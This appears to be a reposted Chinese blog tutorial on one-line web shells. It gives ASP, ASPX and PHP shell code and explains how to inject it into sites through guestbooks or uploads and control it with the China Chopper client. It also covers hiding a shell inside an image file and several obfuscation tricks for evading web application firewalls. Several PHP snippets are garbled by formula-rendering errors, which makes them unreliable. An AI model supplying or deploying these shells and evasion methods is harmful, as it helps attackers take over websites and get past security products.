一句话木马、中国菜刀、图片一句话制作、过狗一句话

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常用一句话木马
asp一句话木马:
   <%execute(request(“value”))%>
  php一句话木马:
  
  aspx一句话木马:
  <%@ Page Language=“Jscript”%>
  <%eval(Request.Item[“value”])%>
其他一句话木马:
<%eval request(“value”)%>
  <%execute request(“value”)%>
  <%execute(request(“value”))%>
  <%If Request(“value”)<>"" Then Execute(Request(“value”))%>
  <%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
  
  不用双引号的一句话木马:
  <%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

客户端:
一句话最常用的客户端为:
一句话客户端增强版
中国菜刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版

使用方法:
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.
记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

木马原理:
首先 < SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(’#’)+’‘这句代码,Request.form(’#’)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分。

关于错误:
服务器错误
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line:execute request(“nettoo”)
Description:类型不匹配: ‘execute’

解决方法:
用"eval"替换掉"execute"服务端,就不会出错了。

中国菜刀与一句话木马
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。
编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。
在URL列表中选中目标网站,点击鼠标右键,选择“文件管理”,可以看到网站的目录结构。

图片一句话制作

如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第1张图片
然后输入DOS命令:copy 1.jpg+1.php 2.jpg
此时产生的2.jpg就是我们要的图片一句话木马。

其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护。

PHP一句话过狗、卫士、D盾等免杀思路!
1.关键字拆分。
比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法

2.可变变量、引用、可变函数。
可变变量 比如 a = a= a=_POST[‘x’]; b = ’ a ’ ; @ e v a l ( b=’a’;@eval( b=a;@eval($b);

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第2张图片
这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

引用 比如 a = a= a=_POST[‘x’];KaTeX parse error: Expected 'EOF', got '&' at position 3: b=&̲a;@eval($b);

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第3张图片
这种方法与上一种方法类似

可变函数 比如 a = ’ a ’ . ’ s s ’ . ’ e ’ . ’ r ’ . ’ t ’ ; a=’a’.’ss’.’e’.’r’.’t’; a=a.ss.e.r.t;a($_POST[‘x’]);

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第4张图片
这种方法对于狗、3卫士、D盾之类的均没有作用哦

3.添加其他代码。
添加其他代码 比如 if(empty($a))
{
a = a= a=_POST[‘x’];
}
@eval($a);

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第5张图片
4.函数替换。
使用其他函数,比如eval可以使用assert替换。
总结:这种方法适合eval函数被禁用时使用哦

5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …一个名为test的函数,并使用a接受参数
eval(KaTeX parse error: Expected 'EOF', got '}' at position 12: a); }̲ test(_POST[‘x’]);

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第6张图片
这种方法适合有PHP基础的人

6.函数回调。
使用其他函数进行调用,并执行。
如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第7张图片
这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦

7.利用各种方法的特性写出过WAF的一句话。
function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …封装函数 if (empty(a)){ //利用所学的添加其他代码
KaTeX parse error: Expected 'EOF', got '}' at position 48: …/使用这句代码扰乱D盾的判断 }̲ @eval(a);
}
@test($_POST[‘x’]);
?>

测试结果:
一句话木马、中国菜刀、图片一句话制作、过狗一句话_第8张图片

转载请注明: 转载自Legend‘s BLog
本文链接地址:
http://www.legendsec.org/1701.html
PHP一句话过狗、卫士、D盾等免杀思路!

你可能感兴趣的:(一句话木马、中国菜刀、图片一句话制作、过狗一句话)